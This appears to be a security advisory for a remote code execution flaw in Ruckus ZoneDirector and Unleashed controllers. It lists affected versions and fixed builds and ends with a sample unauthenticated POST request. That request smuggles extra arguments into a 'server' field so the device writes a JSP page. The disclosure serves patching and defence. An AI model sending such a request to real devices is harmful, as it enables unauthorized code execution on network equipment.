- ZoneDirector - Unleashed
- ZoneDirector: 9.9 and before - ZoneDirector: 9.10.x - ZoneDirector: 9.12.x - ZoneDirector: 9.13.x - ZoneDirector: 10.0.x - ZoneDirector: 10.1.x - ZoneDirector: 10.2.x - ZoneDirector: 10.3.x - Unleashed: 200.6 and before - Unleashed: 200.7
- 9.10.x: Upgrade to 9.10.2.0.84 - 9.12.x: Upgrade to 9.12.3.0.136 - 9.13.x: Upgrade to 10.0.1.0.90 - 10.0.x: Upgrade to 10.0.1.0.90 - 10.1.x: Upgrade to 10.1.2.0.275 - 10.2.x: Upgrade to 10.2.1.0.147 - 10.3.x: Upgrade to 10.3.1.0.21 - 200.6 and before: Upgrade to 200.7.10.202.94 - 200.7: Upgrade to 200.7.10.202.94
Remote code execution vulnerability in zap caused by insufficient input validation.
zap executable is reachable without authentication. Due to insufficient input validation, unintended arguments can be used to write a page which is vulnerable to one of the following command injection vulnerabilities:
SSRF POST request example
POST /tools/_rcmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 310
<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
<xcmd cmd='wc' comp='zapd' wcid=1 client='192.168.0.1' tool='zap-up' zap-type='udp' server='{tx_station} -R -L/web/uploaded/index.jsp -T<%Delegate("AjaxCmdStat" -Ssession["cid"]);%>' syspmtu=65500 />
</ajax-request>